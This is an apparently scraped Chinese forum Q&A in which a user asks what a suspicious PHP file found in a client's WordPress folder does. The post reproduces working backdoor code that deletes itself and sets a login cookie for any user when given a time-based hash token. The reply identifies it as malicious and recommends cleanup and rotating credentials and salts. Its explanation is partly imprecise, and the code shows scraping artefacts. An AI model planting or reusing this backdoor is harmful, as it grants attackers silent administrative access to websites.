我文件夹下文件中的恶意代码。只想知道他在做什么

我在客户文件夹中发现一个奇怪的文件。我想知道这段代码的作用。这是什么意思

$file =( $p = strpos(__FILE__, "(") )=== false ? __FILE__ : substr(__FILE__, 0, $p); if (!unlink($file)){chmod($file, 0777); unlink($file); }define("ABSPATH", dirname(dirname($file))."/"); include_once(ABSPATH."wp-config.php"); include_once(ABSPATH."wp-admin/includes/file.php"); include_once(ABSPATH."wp-admin/includes/plugin.php"); include_once(ABSPATH."wp-admin/includes/theme.php"); include_once(ABSPATH."wp-admin/includes/misc.php"); $k = substr($_SERVER["QUERY_STRING"], 0, 32); $u = substr($_SERVER["QUERY_STRING"], 32); $h = $wpdb-> get_var( $wpdb-> prepare( "SELECT user_pass FROM {$wpdb-> users} WHERE ID = %s", $u ) ); if ( is_string($h) & & ( $k === md5(mktime(date("H"), date("i"), 0).md5($h)) || $k === md5(mktime(date("H"), date("i")-1, 0).md5($h)) || $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){ wp_set_auth_cookie($u); }header("Location: ".\'http://www.example.com/blog/wp-admin/\'); ', LOCK_EX);

请帮助我有关此代码。是黑客代码还是其他?
#1我想你可以将其称为黑客代码。
它读取站点的敏感部分以获取盐和哈希值, 然后从数据库中获取密码。我认为你所有的凭据在该站点上都受到了损害。
【我文件夹下文件中的恶意代码。只想知道他在做什么】删除文件并清理站点后, 你应该使用所有权限轮换所有凭据, 并快速编辑config.php文件, 以用Wordpress API生成的新密钥替换盐键。

    推荐阅读